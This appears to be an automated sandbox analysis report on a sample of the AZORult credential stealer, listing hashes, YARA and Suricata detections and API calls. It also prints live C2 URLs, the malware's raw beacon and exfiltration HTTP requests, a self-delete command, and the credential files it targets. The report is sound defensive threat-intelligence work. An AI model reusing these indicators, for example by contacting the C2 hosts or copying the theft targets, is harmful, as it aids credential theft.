Edit tour

Windows Analysis Report
Oggq2dY6kx.exe

Overview

General Information

Sample name:	Oggq2dY6kx.exe renamed because original name is a hash value
Original sample name:	E3E636DDED2B38EA6FC5710D467C29E9.exe
Analysis ID:	1579276
MD5:	e3e636dded2b38ea6fc5710d467c29e9
SHA1:	682ac24c96964ebc941e107d2ed1cb1619433508
SHA256:	37a6ebef45b4c6b9a635fb2c1152bdef53db3c6d749824c84d8cfe1e79d6df4d
Tags:	AZORultexeuser-abuse_ch
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Azorult

Yara detected Azorult Info Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Oggq2dY6kx.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\Oggq2dY6kx.exe" MD5: E3E636DDED2B38EA6FC5710D467C29E9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://any.run/cybersecurity-blog/azorult-malware-analysis/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://195.245.112.115/index.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Oggq2dY6kx.exe	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Oggq2dY6kx.exe	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Oggq2dY6kx.exe	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
Oggq2dY6kx.exe	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Oggq2dY6kx.exe	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xc778:$a2: %APPDATA%\.purple\accounts.xml 0xcec0:$a3: %TEMP%\curbuf.dat 0x191d4:$a4: PasswordsList.txt 0x141d8:$a5: Software\Valve\Steam
00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x17c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19360:$v2: http://ip-api.com/json 0x17fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xc778:$a2: %APPDATA%\.purple\accounts.xml 0xcec0:$a3: %TEMP%\curbuf.dat 0x191d4:$a4: PasswordsList.txt 0x141d8:$a5: Software\Valve\Steam
00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x17c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19360:$v2: http://ip-api.com/json 0x17fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Process Memory Space: Oggq2dY6kx.exe PID: 7256	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: Oggq2dY6kx.exe PID: 7256	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Oggq2dY6kx.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.Oggq2dY6kx.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.Oggq2dY6kx.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.2.Oggq2dY6kx.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.Oggq2dY6kx.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.0.Oggq2dY6kx.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.0.Oggq2dY6kx.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.0.Oggq2dY6kx.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.0.Oggq2dY6kx.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.0.Oggq2dY6kx.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Click to see the 5 entries

Suricata Signatures

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T12:07:02.118563+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.4	49730	104.21.52.219	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T12:07:02.118563+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.4	49730	104.21.52.219	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Oggq2dY6kx.exe

Avira: detected

Found malware configuration

Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack

Malware Configuration Extractor: Azorult {"C2 url": "http://195.245.112.115/index.php"}

Multi AV Scanner detection for submitted file

Source: Oggq2dY6kx.exe	ReversingLabs: Detection: 95%
Source: Oggq2dY6kx.exe	Virustotal: Detection: 87%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for sample

Source: Oggq2dY6kx.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_004094C4 CryptUnprotectData,LocalFree,

0_2_004094C4

Source: Oggq2dY6kx.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 104.21.52.219:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 104.21.52.219:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49730 -> 104.21.52.219:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://195.245.112.115/index.php

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: inglesxyz.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: inglesxyz.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 66 8b 30 6c eb 42 70 9d 36 70 9d 32 70 9d 30 70 9d 30 70 9c 47 13 8b 30 66 ef 26 66 9b 40 70 9d 30 13 8b 30 61 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10f0lBp6p2p0p0pG0f&f@p00a

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: inglesxyz.shopConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: inglesxyz.shop

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: inglesxyz.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 66 8b 30 6c eb 42 70 9d 36 70 9d 32 70 9d 30 70 9d 30 70 9c 47 13 8b 30 66 ef 26 66 9b 40 70 9d 30 13 8b 30 61 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10f0lBp6p2p0p0pG0f&f@p00a

Source: Oggq2dY6kx.exe, 00000000.00000003.1701448593.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.245.112.115/index.php
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Oggq2dY6kx.exe, 00000000.00000002.1701669567.000000000060E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://inglesxyz.shop/index.php
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://inglesxyz.shop/index.php6N
Source: Oggq2dY6kx.exe	String found in binary or memory: http://ip-api.com/json
Source: Oggq2dY6kx.exe	String found in binary or memory: https://dotbit.me/a/
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop//Yz
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/M
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/g
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/index.php
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/index.php2Tf
Source: Oggq2dY6kx.exe, 00000000.00000002.1701669567.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://inglesxyz.shop/index.phpll

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 104.21.52.219:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: Azorult Payload Author: kevoreilly
Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: String function: 004034E4 appears 36 times

Source: Oggq2dY6kx.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: Oggq2dY6kx.exe, type: SAMPLE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.0.Oggq2dY6kx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000000.1668122599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_0040A4A4 CoCreateInstance,

0_2_0040A4A4

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-39EA5133-F3A5C3F4

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Oggq2dY6kx.exe	ReversingLabs: Detection: 95%
Source: Oggq2dY6kx.exe	Virustotal: Detection: 87%

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe

Code function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00417B1A

Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040D86E push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_0040D870 push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_004140C0 push 004140ECh; ret	0_2_004140E4
Source: C:\Users\user\Desktop\Oggq2dY6kx.exe	Code function: 0_2_004108C8 push 004108F4h; ret	0_2_004108EC
